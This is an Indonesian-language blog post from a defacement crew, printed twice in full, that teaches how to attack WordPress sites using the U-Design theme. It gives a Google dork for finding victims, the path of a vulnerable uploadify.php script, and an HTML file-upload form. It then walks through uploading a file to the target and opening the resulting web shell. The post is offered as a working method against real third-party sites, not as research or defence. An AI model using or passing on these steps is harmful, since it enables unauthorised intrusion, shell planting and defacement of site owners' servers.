Deface poc WordPress Theme Exploit
🚨Deface Poc/Metode Deface WordPress Theme Exploit (Vulnerbility CSRF) 🚨
==================================================
Deface dengan Metode ini Bisa kita Miror kan..
=========================
bahan2:
1.kuota..
2.dork:
#inurl:/wp-content/themes/u-design/
3.exploit: /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
4.csrf: (simpan script dalam bentuk html)
<form method="POST" action=" URL HALAMAN BLANK TADI "
enctype="multipart/form-data"><input type="file" name="Filedata" />
<button>Upload?</button><br/>
</form>
=========================
PENUTOR: saya sendiri(*Mr.CR0n0$*)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ADMIN :@Z5.W1N474
@Keep Alive
_________@Mr Im81 ______________________
_________@The And _______________________
_________@Awhi __________________________
_________@*@nak Wayang* ______________
_________@Mr.Baby Boss☣_______________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Thanks For:- Google.com
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
___★INDONESIA SECURITY LITE★______
____.=SECURITY, SCURED, SCURE=._______
__________________________________________
Ok kita mulai.
1. Dorking dulu di gugel, terserah mau dorking biasa atau dorking gambar
2. Jika sudah dapat target masukan exploit. Contoh : www.targetsuka.co.li/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3. Juka Vuln Akan Blank biasanya, selain blank mungkin kaga vuln
4. Masukan url target kalian ke CSRF online, post name nya pilih Filedata, klik next lalu upload file kalian :v
5. Jika vuln/berhasil akan keluar pernyataan kosong dari website target atau muncul angka atau kata succes...
6. Akses shell nya www.targetsuka.co.li/namafile.php atau www.targetsuka.co.li/[path]/namafile.php
7. Dan jrengg jrenggg :v akses shell sudah berhasil di buka
==================================================
Thanks.. Selamat Mencoba😉
_________________________________________
``Support Kami Di```
*-* https://github.com/4L13199
*-* https://www.youtube.com/channel/UCidraw5qmidD0B8_LoP7Zhw
*-* http://kumandroid.ml
*-* https://defacer.id/archive/team/Indonesia-Security-Lite
==================================================
Deface dengan Metode ini Bisa kita Miror kan..
=========================
bahan2:
1.kuota..
2.dork:
#inurl:/wp-content/themes/u-design/
3.exploit: /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
4.csrf: (simpan script dalam bentuk html)
<form method="POST" action=" URL HALAMAN BLANK TADI "
enctype="multipart/form-data"><input type="file" name="Filedata" />
<button>Upload?</button><br/>
</form>
=========================
PENUTOR: saya sendiri(*Mr.CR0n0$*)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
ADMIN :@Z5.W1N474
@Keep Alive
_________@Mr Im81 ______________________
_________@The And _______________________
_________@Awhi __________________________
_________@*@nak Wayang* ______________
_________@Mr.Baby Boss☣_______________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Thanks For:- Google.com
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
___★INDONESIA SECURITY LITE★______
____.=SECURITY, SCURED, SCURE=._______
__________________________________________
Ok kita mulai.
1. Dorking dulu di gugel, terserah mau dorking biasa atau dorking gambar
2. Jika sudah dapat target masukan exploit. Contoh : www.targetsuka.co.li/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
3. Juka Vuln Akan Blank biasanya, selain blank mungkin kaga vuln
4. Masukan url target kalian ke CSRF online, post name nya pilih Filedata, klik next lalu upload file kalian :v
5. Jika vuln/berhasil akan keluar pernyataan kosong dari website target atau muncul angka atau kata succes...
6. Akses shell nya www.targetsuka.co.li/namafile.php atau www.targetsuka.co.li/[path]/namafile.php
7. Dan jrengg jrenggg :v akses shell sudah berhasil di buka
==================================================
Thanks.. Selamat Mencoba😉
_________________________________________
``Support Kami Di```
*-* https://github.com/4L13199
*-* https://www.youtube.com/channel/UCidraw5qmidD0B8_LoP7Zhw
*-* http://kumandroid.ml
*-* https://defacer.id/archive/team/Indonesia-Security-Lite
Komentar
Posting Komentar